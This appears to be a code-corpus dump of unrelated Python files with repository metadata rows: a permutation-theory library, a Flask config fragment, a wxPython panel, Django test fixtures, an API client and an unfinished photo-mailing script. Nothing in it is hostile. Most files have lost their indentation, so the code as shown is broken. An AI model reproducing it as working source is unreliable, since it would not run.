LOGIN_MESSAGE_CATEGORY = "error"
# Caching
CACHE_TYPE = "simple"
CACHE_DEFAULT_TIMEOUT = 60
## Captcha
RECAPTCHA_ENABLED = False
RECAPTCHA_USE_SSL = False
RECAPTCHA_PUBLIC_KEY = "your_public_recaptcha_key"
RECAPTCHA_PRIVATE_KEY = "your_private_recaptcha_key"
RECAPTCHA_OPTIONS = {"theme": "white"}
## Mail
MAIL_SERVER = "localhost"
MAIL_PORT = 25
MAIL_USE_SSL = False
MAIL_USE_TLS = False
MAIL_USERNAME = "[email protected]"
MAIL_PASSWORD = ""
MAIL_DEFAULT_SENDER = ("Default Sender", "[email protected]")
# Where to logger should send the emails to
ADMINS = ["[email protected]"]
## Flask-And-Redis
REDIS_ENABLED = False
REDIS_HOST = 'localhost'
REDIS_PORT = 6379
REDIS_DB = 0
FORUM_URL_PREFIX = ""
USER_URL_PREFIX = "/user"
AUTH_URL_PREFIX = "/auth"
ADMIN_URL_PREFIX = "/admin"
| bsd-3-clause | -3,027,264,106,101,590,500 | 26.43956 | 79 | 0.617942 | false |
goldengod/dep | plib.py | 1 | 20556 | #some import
import numpy
import itertools
import random
import math
import os.path
import urllib2
import sys
#global variables
n = None
N = None
Dk = None
Du = None
Dc = None
e = None
r = None
x = None
xa = None
ASW = None
EXC = None
INS = None
pASW = None
pEXC = None
pINS = None
#help function
def help():
print("""
VARIABLES
---------
n permutation size
N total number of permutations
Dk diameter with Kendall's tau distance
Du diameter with Ulam distance
Dc diameter with Cayley distance
e identity permutation
r identity reversed permutation
x a random permutation
xa antipodal permutation of x with respect to exchanges
ASW set of adjacent swap generators (in tuple normal form)
EXC set of exchange generators (in tuple normal form)
INS set of insertion generators (in tuple normal form)
pASW ASW in permutation form
pEXC EXC in permutation form
pINS INS in permutation form
FUNCTIONS
---------
reset(n) re-initialize environment with a new permutation size
fact(n) factorial of n
inv(x) inverse of x
rev(x) reverse of x
compl(x) complement of x
dot(x,y) composition x*y
prand() a random permutation
isPerm(x) check if the list x is a permutation
asw(i) adjacent swap (i,i+1) [callable also with a tuple arg]
exc(i,j) exchange (i,j) [callable also with a tuple arg]
ins(i,j) insertion (i,j) [callable also with a tuple arg]
asw_nf(i) tuple normal form for adjacent swap (i,j) with j=i+1
exc_nf(t) tuple normal form for exchange (t[0],t[1]) with t[1]>t[0]
ins_nf(t) tuple normal form for insertion (t[0],t[1]) with t[1]>t[0] only for case t[1]=t[0]+1
aswToTuple(x) convert an adjacent swap from permutation form to tuple form
excToTuple(x) convert an exchange from permutation form to tuple form
insToTuple(x) convert an insertion from permutation form to tuple form
swap(x,i,j) swap items at position i and j in x (inplace)
insert(x,i,j) shift item at position i to position j in x (inplace)
dk(x,y) Kendall's tau distance between x and y
du(x,y) Ulam distance between x and y
dc(x,y) Cayley distance between x and y
ninver(x) number of inversion in x
inver(x) set of inversions in x
ainver(x) list of adjacent inversions in x
lis(x) standard lis of x
llis(x) length of a lis of x
alis(x) all the lis of x
urlis(x) unfirom random lis of x
ind(l,x) indexes of x where values in list l appear
cycles(x) cycle decomposition of x
ncycles(x) number of cycles of the decomposition of x
cycleToPerm(c) build a permutation corresponding to cycle c
prandUnredLis() random permutation whose lis is "unreducible"
hasUnredLis(x) check if the lis of x can be reduced or not
lisldsRedCases(x)     print and return lis/lds reduction cases after applying all insertion generators (if an additional False is passed it doesn't print)
printLisLdsRedCases(d) print the result of "lisldsRedCases"
bothLisLdsIncrease() get a random permutation x + ins generator g such that x*g increases both lis and lds lengths
prand1c() random permutation whith only one cycle
stirling1u(n,k) [n,k] unsigned stirling number of the 1st kind
npermWithCycles(k) number of permutations with k cycles
lds(x) standard lds of x
llds(x) length of a lds of x
alds(x) all the lds of x
urlds(x) uniform random lds of x
mahonian(n,k) [n,k] mahonian number
npermWithInvers(k) number of permutations with k inversions
seqA047874(n,k) [n,k] number of the sequence A047874 (it works only till n=60 and requires the file at https://oeis.org/A047874/b047874.txt or internet)
npermWithLisLength(k) number of permutations with a lis of length k (it works only till n=60 and requires the file at https://oeis.org/A047874/b047874.txt or internet)
applySeq(x,s) return x*s[0]*s[1]*...
composeSeq(s) return s[0]*s[1]*...
mapAswSeq(s) from a sequence of ASW tuples return a sequence of permutations
mapExcSeq(s) from a sequence of EXC tuples return a sequence of permutations
mapInsSeq(s) from a sequence of INS tuples return a sequence of permutations
randbs(x) return a sequence of ASW tuples that sorts x
randDecAsw(x) return a ASW decomposition of x
randss(x) return a sequence of EXC tuples that sorts x
randmergess(x) return a sequence of EXC tuples that UNsorts x
randDecExc(x) return a EXC decomposition of x
randis(x,randlis) return a sequence of INS tuples that sorts x (UNIFORM STEP NOT IMPLEMENTED) (the randlis function as parameter is optional)
randDecIns(x,randlis) return a INS decomposition of x (see randis)
checkAllInsDiamRev() return true if for all permutations x the Ulam distance between x and rev(x) equals the Ulam diameter
ssort(x) return the sequence of EXC using classical selection sort
expInertia(nexp,q) write how many inertia anomalies with q adj.swaps are over nexp random experiments
all_asw_decomp(x) return all the decompositions (using ASW) of x
checkAverage(q)       check if a*x+(1-a)*y has equiprobability (over q random trials)
perm2str(x) return string representation of the permutation x
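
EXAMPLE
-------
(illustrative session: the values shown depend on the random permutation)
>>> reset(6)                          # work with permutations of size 6
>>> x = prand()                       # a random permutation, e.g. [2, 0, 5, 1, 4, 3]
>>> ninver(x), llis(x)                # inversions and longest-increasing-subsequence length
>>> s = randbs(x)                     # adjacent-swap tuples that sort x
>>> applySeq(x, mapAswSeq(s)) == e    # applying them to x yields the identity
True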
""")
#test function
#def test():
# pass
#default permutation size
DEFAULT_n = 10
#reset/init functions (with global variables declaration)
def reset(size=DEFAULT_n):
#global variables
global n,N,Dk,Du,Dc,e,r,ASW,EXC,INS,pASW,pEXC,pINS
#permutation size
n = size
#total number of permutations
N = fact(n)
#diameters
Dk = n*(n-1)/2
Du = n-1
Dc = n-1
#useful permutations
e = range(n)
r = e[::-1]
x = prand()
xa = applySeq(x,mapExcSeq(randmergess(x)))
#generators sets
ASW = set()
for i in range(n-1):
ASW.add((i,i+1))
pASW = sorted(map(lambda p : asw(p), ASW))
EXC = set()
for i in range(n):
for j in range(i+1,n):
EXC.add((i,j))
pEXC = sorted(map(lambda p : exc(p), EXC))
INS = set()
for i in range(n):
for j in filter(lambda j : j!=i and j!=i-1,range(n)):
INS.add((i,j))
pINS = sorted(map(lambda p : ins(p), INS))
#copy variables to the main module scope
import __main__
__main__.n = n
__main__.N = N
__main__.Dk = Dk
__main__.Du = Du
__main__.Dc = Dc
__main__.e = e
__main__.r = r
__main__.x = x
__main__.xa = xa
__main__.ASW = ASW
__main__.pASW = pASW
__main__.EXC = EXC
__main__.pEXC = pEXC
__main__.INS = INS
__main__.pINS = pINS
init = reset
#some basic functions
def fact(n):
return math.factorial(n)
def inv(x):
z = [None]*n
for i in range(n):
z[x[i]] = i
return z
def rev(x):
return x[::-1]
def dot(x,y):
return [x[v] for v in y]
def prand():
return numpy.random.permutation(n).tolist()
def isPerm(x):
return sorted(x)==e
def compl(x):
return [n-1-v for v in x]
#generators to permutation functions
def asw(g1,g2=-1):
if type(g1) is tuple:
return exc(g1[0],g1[0]+1)
else:
return exc(g1,g1+1)
def exc(g1,g2=-1):
if type(g1) is tuple:
i,j = g1
else:
i,j = g1,g2
z = e[:]
z[i],z[j] = z[j],z[i]
return z
def ins(g1,g2=-1):
if type(g1) is tuple:
i,j = g1
else:
i,j = g1,g2
if i<j:
return range(i) + range(i+1,j+1) + [i] + range(j+1,n)
else:
return range(j) + [i] + range(j,i) + range(i+1,n)
def asw_nf(t):
if type(t) is not tuple:
return (t,t+1)
return exc_nf(t)
def exc_nf(t):
return tuple(sorted(t))
def ins_nf(t):
return tuple(sorted(t)) if t[0]==t[1]+1 else t
def aswToTuple(x):
t = excToTuple(x)
if t[1]!=t[0]+1:
print("It is not an adjacent swap!!!")
return (t[0],t[0]+1)
def excToTuple(x):
diff = [i==x[i] for i in range(n)]
if diff.count(False)!=2:
print("It is not an exchange!!!")
return tuple([i for i,v in enumerate(diff) if not v])
def insToTuple(x):
diff = [i==x[i] for i in range(n)]
if diff.count(False)<2:
print("It is not an insertion!!!")
first,last = diff.index(False),n-1-diff[::-1].index(False)
if any(diff[first:last]):
print("It is not an insertion!!!")
if x[first]==first+1: #i<j
if x[first:last-1]!=range(first+1,last):
print("It is not an insertion!!!")
return (first,last)
else: #i>j
if x[first+1:last]!=range(first,last-1) or x[first]!=last:
print("It is not an insertion!!!")
return (last,first)
#swap and insert inplace
def swap(x,i,j=-1):
if j==-1:
j = i+1
x[i],x[j] = x[j],x[i]
def insert(x,i,j):
t = x[i]
del x[i]
x.insert(j,t)
#distances
def dk(x,y):
return ninver(dot(inv(y),x))
def du(x,y):
return n-llis(dot(inv(y),x))
def dc(x,y):
return n-ncycles(dot(inv(y),x))
#inversion function
def ninver(x):
return len(inver(x))
def inver(x):
return set([(i,j) for i,j in itertools.combinations(range(n),2) if x[i]>x[j]])
def ainver(x):
return [(i,i+1) for i in range(n-1) if x[i]>x[i+1]]
#lis functions
def lis(x):
#see http://rosettacode.org/wiki/Longest_increasing_subsequence#Python
X = x[:]
N = len(X)
P = [0 for i in range(N)]
M = [0 for i in range(N+1)]
L = 0
for i in range(N):
lo = 1
hi = L
while lo <= hi:
mid = (lo+hi)//2
if (X[M[mid]] < X[i]):
lo = mid+1
else:
hi = mid-1
newL = lo
P[i] = M[newL-1]
M[newL] = i
if (newL > L):
L = newL
S = []
k = M[L]
for i in range(L-1, -1, -1):
S.append(X[k])
k = P[k]
return S[::-1]
def llis(x):
return len(lis(x))
def alis(x):
#see http://stackoverflow.com/questions/9554266/finding-all-possible-longest-increasing-subsequence?rq=1
count = [1]*n
def longestIncreaseSubsequence(seq):
n = len(seq)
for i in range(1,n):
maxi = 0
for j in range(i-1,-1,-1):
if seq[j]<seq[i]:
maxi = max(maxi,count[j])
count[i] = maxi + 1
maxi = 0
for i in range(len(count)):
if count[i]>maxi:
maxi = count[i]
return maxi
def allLIS(a,k,count,arr,maxi,result):
if k==maxi:
lista = []
for i in range(maxi,0,-1):
lista.append(arr[a[i]])
result.append(lista)
else:
k = k+1
candidates = [None]*len(arr)
ncandidate = 0
for i in range(a[k-1],-1,-1):
if count[i]==maxi-k+1 and (arr[i]<arr[a[k-1]] or count[i]==maxi):
candidates[ncandidate] = i
ncandidate = ncandidate + 1
for i in range(0,ncandidate):
a[k] = candidates[i]
allLIS(a,k,count,arr,maxi,result)
maxi = longestIncreaseSubsequence(x)
a = [None]*(maxi+1)
a[0] = len(x)-1
result = []
allLIS(a,0,count,x,maxi,result)
return result
def urlis(x):
return random.choice(alis(x))
def ind(l,x):
return [x.index(v) for v in l]
#cycles functions
def cycles(perm):
#see https://gist.github.com/begriffs/2211881
remain = set(perm)
result = []
while len(remain) > 0:
n = remain.pop()
cycle = [n]
while True:
n = perm[n]
if n not in remain:
break
remain.remove(n)
cycle.append(n)
result.append(cycle)
return result
def ncycles(x):
return len(cycles(x))
def cycleToPerm(c):
z = range(n)
for k in range(len(c)-1):
i = c[k]
j = c[k+1]
z[i] = j
z[c[-1]] = c[0]
return z
#lis reduction functions
def prandUnredLis():
while True:
x = prand()
lx = llis(x)
flag = True
for pins in pINS:
y = dot(x,pins)
ly = llis(y)
if ly<lx:
flag = False
if flag:
return x
def hasUnredLis(x):
lx = llis(x)
for pins in pINS:
y = dot(x,pins)
if llis(y)<lx:
return False
return True
def lisldsRedCases(x,verbose=True):
r = { "<<":0, "<=":0, "<>":0, "=<":0, "==":0, "=>":0, "><":0, ">=":0, ">>":0, "other":0 }
l1x,l2x = llis(x),llds(x)
for g in pINS:
y = dot(x,g)
l1y,l2y = llis(y),llds(y)
if l1y==l1x-1 and l2y==l2x-1:
r["<<"] += 1
elif l1y==l1x-1 and l2y==l2x:
r["<="] += 1
elif l1y==l1x-1 and l2y==l2x+1:
r["<>"] += 1
elif l1y==l1x and l2y==l2x-1:
r["=<"] += 1
elif l1y==l1x and l2y==l2x:
r["=="] += 1
elif l1y==l1x and l2y==l2x+1:
r["=>"] += 1
elif l1y==l1x+1 and l2y==l2x-1:
r["><"] += 1
elif l1y==l1x+1 and l2y==l2x:
r[">="] += 1
elif l1y==l1x+1 and l2y==l2x+1:
r[">>"] += 1
else:
r["other"] += 1
if verbose:
printLisLdsRedCases(r)
return r
def printLisLdsRedCases(d):
print("ID")
print("<< : "+(str(d["<<"] if "<<" in d else 0)))
print("<= : "+(str(d["<="] if "<=" in d else 0)))
print("<> : "+(str(d["<>"] if "<>" in d else 0)))
print("=< : "+(str(d["=<"] if "=<" in d else 0)))
print("== : "+(str(d["=="] if "==" in d else 0)))
print("=> : "+(str(d["=>"] if "=>" in d else 0)))
print(">< : "+(str(d["><"] if "><" in d else 0)))
print(">= : "+(str(d[">="] if ">=" in d else 0)))
print(">> : "+(str(d[">>"] if ">>" in d else 0)))
print("other : "+(str(d["other"] if "other" in d else 0)))
def bothLisLdsIncrease():
while True:
x = prand()
l1x,l2x = llis(x),llds(x)
for g in pINS:
y = dot(x,g)
l1y,l2y = llis(y),llds(y)
if l1y>l1x and l2y>l2x:
return [x,g]
#random permutation with only 1 cycle
def prand1c():
x = [None]*n
c = range(1,n)
i = 0
while c:
j = random.choice(c)
c.remove(j)
x[i] = j
i = j
x[i] = 0
return x
#cycle distribution functions
def stirling1u(n,k):
#stirling number of the 1st kind unsigned
if n==0 and k==0:
return 1
if n==0 or k==0:
return 0
return (n-1)*stirling1u(n-1,k) + stirling1u(n-1,k-1)
def npermWithCycles(k):
return stirling1u(n,k)
#lds functions
def lds(x):
return compl(lis(compl(x)))
def llds(x):
return len(lds(x))
def alds(x):
return [compl(l) for l in alis(compl(x))]
def urlds(x):
return compl(urlis(compl(x)))
#inversion distribution functions
def mahonian(n,k):
#see http://stackoverflow.com/questions/19372991/number-of-n-element-permutations-with-exactly-k-inversions
def mahonian_row(n):
i = 1
result = [1]
while i < n:
prev = result[:]
result = [0] * int(1 + ((i + 1) * 0.5) * (i))
m = [1] * (i + 1)
for j in range(len(m)):
for k in range(len(prev)):
result[k+j] += m[j] * prev[k]
i = i + 1
return result
return mahonian_row(n)[k]
def npermWithInvers(k):
return mahonian(n,k)
#lis length distribution function
def seqA047874(n,k):
#see https://oeis.org/A047874 and https://oeis.org/A047874/b047874.txt
if n>60:
print("Impossible to compute this value for n greater than 60")
lineno = n*(n-1)/2 + k
fn = "b047874.txt"
if os.path.exists(fn):
with open(fn,"r") as f:
for line in f:
if int(line.split()[0])==lineno:
return int(line.split()[1])
else:
print "Trying to read the file from web https://oeis.org/A047874/b047874.txt"
un = "https://oeis.org/A047874/b047874.txt"
txt = urllib2.urlopen(un).read().split("\n")
for line in txt:
if int(line.split()[0])==lineno:
return int(line.split()[1])
return -1
def npermWithLisLength(k):
return seqA047874(n,k)
#randomized sorting algorithms
def applySeq(x,s):
z = x[:]
for y in s:
z = dot(z,y)
return z
def composeSeq(s):
return applySeq(e,s)
def mapAswSeq(s):
return map(lambda p : asw(p), s)
def mapExcSeq(s):
return map(lambda p : exc(p), s)
def mapInsSeq(s):
return map(lambda p : ins(p), s)
def randbs(x):
y = x[:]
s = []
ai = ainver(y)
while len(ai)>0:
sw = random.choice(ai)
swap(y,sw[0],sw[1])
ai = ainver(y)
s.append(sw)
return s
def randDecAsw(x):
return randbs(inv(x))
def randss(x):
y = x[:]
s = []
cyc = cycles(y)
while len(cyc)<n:
cyc = filter(lambda c : len(c)>1,cyc)
q = list(numpy.cumsum([len(c)*(len(c)-1)/2 for c in cyc]))
tot = q[-1]
r = random.randint(0,tot-1)
for i in range(len(cyc)):
if r<q[i]:
c = i
c = cyc[c]
i = random.choice(c)
c.remove(i)
j = random.choice(c)
s.append(exc_nf((i,j)))
swap(y,i,j)
cyc = cycles(y)
return s
def randmergess(x):
y = x[:]
s = []
cyc = cycles(y)
while len(cyc)>1:
w = list(numpy.cumsum([len(cyc[k])*(n-len(cyc[k])) for k in range(len(cyc))]))
r = random.randint(0,w[-1]-1)
for c1 in range(len(cyc)):
if r<w[c1]:
break
i = random.choice(cyc[c1])
del cyc[c1]
w = list(numpy.cumsum(map(lambda c : len(c),cyc)))
r = random.randint(0,w[-1]-1)
for c2 in range(len(cyc)):
if r<w[c2]:
break
j = random.choice(cyc[c2])
s.append(exc_nf((i,j)))
swap(y,i,j)
cyc = cycles(y)
return s
def randDecExc(x):
return randss(inv(x))
def randis(x,randlis=urlis):
y = x[:]
s = []
lis = randlis(y)
while len(lis)<n:
u = [i for i in range(n) if i not in lis]
i = random.choice(ind(u,y))
ival = y[i]
for b in range(len(lis)):
if lis[b]>ival:
break
else:
b = len(lis)
if b==0:
a,b = 0,y.index(lis[0])
elif b==len(lis):
a,b = y.index(lis[-1]),n-1
else:
a,b = y.index(lis[b-1]),y.index(lis[b])
if a==b:
j = a
elif i<a:
j = random.randint(a,b-1)
elif i>b:
j = random.randint(a+1,b)
else:
j = None
print("Problem with randis")
s.append(ins_nf((i,j)))
lis.append(ival)
lis = sorted(lis)
insert(y,i,j)
if lis not in alis(y):
print("BIG PROBLEM")
return s
def randDecIns(x,randlis=urlis):
	return randis(inv(x),randlis)
def checkAllInsDiamRev():
#return true if for all permutations x the Ulam distance between x and rev(x) equals the Ulam diameter
#return false otherwise
for p in itertools.permutations(e):
x = list(p)
r = rev(x)
if du(x,r)!=Du:
return False
return True
def ssort(x):
y = x[:]
s = []
for j in range(0,n-1):
imin = j
for i in range(j+1,n):
if y[i]<y[imin]:
imin = i
if imin!=j:
t = y[j]
y[j] = y[imin]
y[imin] = t
s.append(exc_nf((j,imin)))
return s
def expInertia(nexp=1000,q=1):
anomalies = 0
for i in xrange(nexp):
x = prand()
dx = randDecAsw(x)
#y = dot(x,asw(dx[0]))
y = [x[k] for k in xrange(n)] #
for j in xrange(q): #
if j>=len(dx): #
break #
y = dot(y,asw(dx[j])) #
wx = ninver(x)
wy = ninver(y)
#if wy!=wx+1:
if wy!=wx+q: #
anomalies += 1
print "Anomalies: " + str(anomalies) + " / " + str(nexp)
def all_asw_decomp_aux(a,L,sc,ld):
n=len(a)
if L==[]:
ld.append(sc)
else:
for i in L:
L1=[j for j in L if j!=i]
sc1=[i]+sc
swap(a,i,i+1) #scambia(a,i,i+1)
if i<n-2 and i+1 not in L1 and a[i+1]>a[i+2]:
L1.append(i+1)
if i>0 and i-1 not in L1 and a[i-1]>a[i]:
L1.append(i-1)
all_asw_decomp_aux(a,L1,sc1,ld)
swap(a,i,i+1) #scambia(a,i,i+1)
def all_asw_decomp(a):
ld=[]
n=len(a)
L=[i for i in range(n-1) if a[i]>a[i+1]]
all_asw_decomp_aux(a,L,[],ld)
return ld
def perm2str(x):
s = ""
for i in range(len(x)):
s += str(x[i])
if i<len(x)-1:
s += ","
return s
def checkAverage(q):
for j in range(q):
x = prand()
y = prand()
if dk(x,y)<=1:
continue
#x+a*(y-x) and y+(1-a)*(x-y)
#z=y-x=x^-1*y and w=x-y=y^-1*x=inv(y-x)
z = dot(inv(x),y)
w = inv(z)
adz = all_asw_decomp(z)
l = len(adz[0])
k = random.randint(1,l-1) #in [1,l-1]
#k generators from (y-x) and l-k generators from (x-y)
dict1 = {}
dict2 = {}
for d in adz:
zz = x
for i in range(k):
zz = dot(zz,asw(d[i]))
sz = perm2str(zz)
if sz in dict1:
dict1[sz] += 1
else:
dict1[sz] = 1
ww = y
drev = rev(d)
for i in range(l-k):
ww = dot(ww,asw(drev[i]))
sw = perm2str(ww)
if sw in dict2:
dict2[sw] += 1
else:
dict2[sw] = 1
if dict1!=dict2:
return False;
return True
#init the environment and print usage
init()
#test()
help()
| gpl-2.0 | -3,328,842,759,987,136,500 | 22.886199 | 158 | 0.570393 | false |
RobinQuetin/CAIRIS-web | cairis/cairis/WeaknessAnalysisPanel.py | 1 | 1665 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import wx
import armid
from BasePanel import BasePanel
import Asset
from WeaknessAnalysisNotebook import WeaknessAnalysisNotebook
class WeaknessAnalysisPanel(BasePanel):
def __init__(self,parent,cvName,envName):
BasePanel.__init__(self,parent,armid.WEAKNESSANALYSIS_ID)
self.theAssetId = None
mainSizer = wx.BoxSizer(wx.VERTICAL)
nbBox = wx.StaticBox(self,-1)
nbSizer = wx.StaticBoxSizer(nbBox,wx.VERTICAL)
mainSizer.Add(nbSizer,1,wx.EXPAND)
nbSizer.Add(WeaknessAnalysisNotebook(self,cvName,envName),1,wx.EXPAND)
buttonSizer = wx.BoxSizer(wx.HORIZONTAL)
applyButton = wx.Button(self,armid.WEAKNESSANALYSIS_BUTTONCOMMIT_ID,"Apply")
buttonSizer.Add(applyButton)
closeButton = wx.Button(self,wx.ID_CANCEL,"Cancel")
buttonSizer.Add(closeButton)
mainSizer.Add(buttonSizer,0,wx.CENTER)
self.SetSizer(mainSizer)
| apache-2.0 | -8,500,019,050,988,761,000 | 38.642857 | 80 | 0.76036 | false |
datamade/django-councilmatic | tests/conftest.py | 1 | 4072 | import pytest
from pytest_django.fixtures import db
from uuid import uuid4
from django.core.management import call_command
from django.db import connection
from councilmatic_core.models import Bill, BillDocument, Event, EventDocument
@pytest.fixture
@pytest.mark.django_db
def organizations(db):
call_command('loaddata', 'tests/fixtures/organization.json')
@pytest.fixture
@pytest.mark.django_db
def bills(db):
call_command('loaddata', 'tests/fixtures/bill.json')
@pytest.fixture
@pytest.mark.django_db
def people(db):
call_command('loaddata', 'tests/fixtures/person.json')
@pytest.fixture
@pytest.mark.django_db
def events(db):
call_command('loaddata', 'tests/fixtures/event.json')
@pytest.fixture
@pytest.mark.django_db
def metro_bill(db):
bill_info = {
'ocd_id': 'ocd-bill/8ad8fe5a-59a0-4e06-88bd-58d6d0e5ef1a',
'description': 'CONSIDER: A. AUTHORIZING the CEO to execute Modification No. 2 to Contract C1153, Advanced Utility Relocations (Westwood/UCLA Station), with Steve Bubalo Construction Company for supply and installation of equipment for a traffic Video Detection System (VDS) required by Los Angeles Department of Transportation (LADOT), in the amount of $567,554, increasing the total contract value from $11,439,000 to $12,006,554; and B. APPROVING an increase in Contract Modification Authority (CMA) to Contract C1153, Advanced Utility Relocations (Westwood/UCLA Station), increasing the current CMA from $1,143,900 to $2,287,800.',
'identifier': '2018-0285',
'ocd_created_at': '2017-01-16 15:00:30.329048-06',
'ocd_updated_at': '2017-01-16 15:00:30.329048-06',
'updated_at': '2017-01-16 15:00:30.329048-06',
}
bill = Bill.objects.create(**bill_info)
return bill
@pytest.fixture
@pytest.mark.django_db
def metro_event(db):
event_info = {
'ocd_id': 'ocd-event/17fdaaa3-0aba-4df0-9893-2c2e8e94d18d',
'ocd_created_at': '2017-05-27 11:10:46.574-05',
'ocd_updated_at': '2017-05-27 11:10:46.574-05',
'name': 'System Safety, Security and Operations Committee',
'start_time': '2017-05-18 12:15:00-05',
'updated_at': '2017-05-17 11:06:47.1853',
'slug': uuid4(),
}
event = Event.objects.create(**event_info)
return event
@pytest.fixture
@pytest.mark.django_db
def metro_bill_document(metro_bill, db):
document_info = {
'bill_id': metro_bill.ocd_id,
'document_type': 'V',
'updated_at': '2017-02-16 15:00:30.329048-06',
'full_text': '',
'note': 'Board Report',
'url': 'https://metro.legistar.com/ViewReport.ashx?M=R&N=TextL5&GID=557&ID=5016&GUID=LATEST&Title=Board+Report',
}
document = BillDocument.objects.create(**document_info)
return document
@pytest.fixture
@pytest.mark.django_db
def metro_event_document(metro_event, db):
document_info = {
'event_id': metro_event.ocd_id,
'updated_at': '2017-05-27 11:10:46.574-05',
'full_text': '',
'note': 'Agenda',
'url': 'http://metro.legistar1.com/metro/meetings/2017/5/1216_A_System_Safety,_Security_and_Operations_Committee_17-05-18_Agenda.pdf',
}
document = EventDocument.objects.create(**document_info)
return document
@pytest.fixture
@pytest.mark.django_db
def metro_change_bill(metro_bill, db):
with connection.cursor() as cursor:
sql = '''
CREATE TABLE change_bill (
ocd_id VARCHAR,
PRIMARY KEY (ocd_id)
);
INSERT INTO change_bill (ocd_id)
VALUES ('{}');
'''.format(metro_bill.ocd_id)
cursor.execute(sql)
@pytest.fixture
@pytest.mark.django_db
def metro_change_event(metro_event, db):
with connection.cursor() as cursor:
sql = '''
CREATE TABLE change_event (
ocd_id VARCHAR,
PRIMARY KEY (ocd_id)
);
INSERT INTO change_event (ocd_id)
VALUES ('{}');
'''.format(metro_event.ocd_id)
cursor.execute(sql)
| mit | -3,183,727,234,289,889,300 | 32.377049 | 643 | 0.649558 | false |
gizwits/gservice_sdk_py | gservice/api/client.py | 1 | 1504 | #coding:utf-8
'''
module::APIClient
~~~~~~~~~~~~~~~~~
request handler
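
Typical usage (illustrative sketch; the credentials below are placeholders):

    client = APIClient()
    client.login("account", "password")   # fetches and stores the user token
    # further requests: build a prepared call with the ``calls`` helpers and
    # pass it to client.send_request(...), which returns the decoded JSON dict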
'''
import requests
import json
from ..calls.g_login import login as login_call
class APIClient(object):
def __init__(self):
self.session = requests.Session()
self.token = None
self.uid = None
self.expire_at = None
self.headers = {"Content-Type": "application/json"}
def set_token(self, token):
'''Set token manually to avoid having to login repeatedly'''
self.token = token
self.headers["X-Gizwits-User-token"] = self.token
def login(self, acc, pwd):
'''login to gservice
'''
r = self.send_request(login_call(acc, pwd))
self.set_token(r['token'])
self.uid = r['uid']
self.expire_at = r['expire_at']
def send_request(self, request, timeout=30):
'''
:param request: A prepared Request object for the request.
:type request_method: Request
:param timeout: Timeout duration in seconds.
:type timeout: int
:returns: dict
'''
request.headers = self.headers
# Include the session headers in the request
request.headers.update(self.session.headers)
if request.data == []:
# let the body clean.
# request.data = json.dumps({})
pass
else:
request.data = json.dumps(request.data)
r = self.session.send(request.prepare(), timeout=timeout)
        return r.json()  # the service answers with JSON; hand back a dict as documented
| mit | 4,340,423,305,111,544,300 | 26.345455 | 68 | 0.577128 | false |
hugoShaka/photo-mailer | mailerv2.py | 1 | 5032 | # -*- coding: utf-8 -*-
import getpass
import sys, os
import smtplib
import socket
from email.mime.multipart import MIMEMultipart
from email.mime.image import MIMEImage
from email.mime.text import MIMEText
from email.mime.application import MIMEApplication
from iptcinfo import IPTCInfo
import logging
logging.basicConfig(filename='error.log')
class photo:
"""A photo can be sent, it also contains the recipient's email address"""
def __init__(self,fileloc):
self.location=fileloc
try:
self.info=IPTCInfo(self.location)
self.addr=str(self.info.data['object name'])
self.IPTCred=True
except Exception:
print(fileloc+" No valid IPTC tags found.")
self.IPTCred=False
def generateEmail(self,mailaccount,message):
if self.addr=='':
self.email=None
print("Warning no valid email address for : "+self.location)
else:
self.email=mail(self.addr,self.location,mailaccount,message)
self.sent=False
def send(self):
if self.sent:
print('Warning :Re-sending the email')
self.email.send()
self.sent=True
class folder:
"""Contains the path to the photos. Can be scanned to get the photos and can be used to mass edit/send the mails/the photos"""
def __init__(self,pathtofolder):
self.path=pathtofolder
self.files=[]
def scan(self):
howManyImport=0
for root, dirs, files in os.walk(self.path):
for file in files:
if file.endswith(".jpg"):
importedPhoto=photo(os.path.join(root, file))
if importedPhoto.IPTCred:
self.files.append(importedPhoto)
howManyImport+=1
print(str(howManyImport) + " files were sucessfully imported")
def generateEmails(self,mailaccount,message):
for pic in self.files:
pic.generateEmail(mailaccount,message)
class mailaccount:
"""Compte mail et parametres de connexion au serveur
"""
def __init__(self):
self.sender="Club Photo"
self.port="587"
self.smtp="smtp.rez-gif.supelec.fr"
self.login="None"
self.connected=False
def credentials(self):
self.login=raw_input("Login : ")
self.pwd=getpass.getpass("Mot de passe : \n")
def showMailSettings(self):
print("\n--------------------\n MailServer Settings \n--------------------\n")
print("sender : "+self.sender+"\nsmtp server : "+self.smtp+"\nport : "+self.port+"\nlogin : ")
if not self.connected:
print("Status : not connected")
else:
print("Status : connected as : "+self.login)
def editMailSettings(self):
self.sender=raw_input("sender ?")
self.smtp=raw_input("server ?")
self.port=raw_input("port?")
def log(self):
try:
self.mailserver=smtplib.SMTP(self.smtp,self.port)
self.mailserver.ehlo()
self.mailserver.starttls()
self.mailserver.ehlo()
self.mailserver.login(self.login,self.pwd)
self.connected=True
        except socket.error as err:
            print("Socket error ({0}): {1}".format(err.errno, err.strerror))
self.connected=False
def unlog(self):
self.mailserver.quit()
self.connected=False
class mail:
"""Objet mail qui possède les methodes pour etre envoye, recupere ses parametres d'un objet mailaccount"""
def __init__(self,reciever,photo,mailaccount,message):
if reciever==None:
print("\n /!\ Email not created due to invalid email address")
else:
            self.account=mailaccount
            self.msg=MIMEMultipart()
self.msg['From'] = mailaccount.sender
self.msg['To'] = reciever
self.msg['Subject'] = message.subject
self.msg.attach(MIMEText(message.generate()))
pj=open(photo, 'rb')
self.msg.attach(MIMEApplication(pj.read(),Content_Disposition='attachement;filename="%s"' % os.path.basename(photo),Name=os.path.basename(photo)))
pj.close()
print("Mail to : "+reciever+" successfully generated")
    def send(self):
        """Send the mail object through the mailaccount it was created with"""
        if self.account.connected:
            self.account.mailserver.sendmail(self.account.sender, self.msg['To'], self.msg.as_string())
        else:
            self.account.log()
            self.account.mailserver.sendmail(self.account.sender, self.msg['To'], self.msg.as_string())
class message:
"""A class to manage the e-mail text"""
def __init__(self,text='No text'):
self.text=text
self.sign=''
self.subject='Your photo'
def generate(self):
return self.text+'\n-- \n'+self.sign
def main():
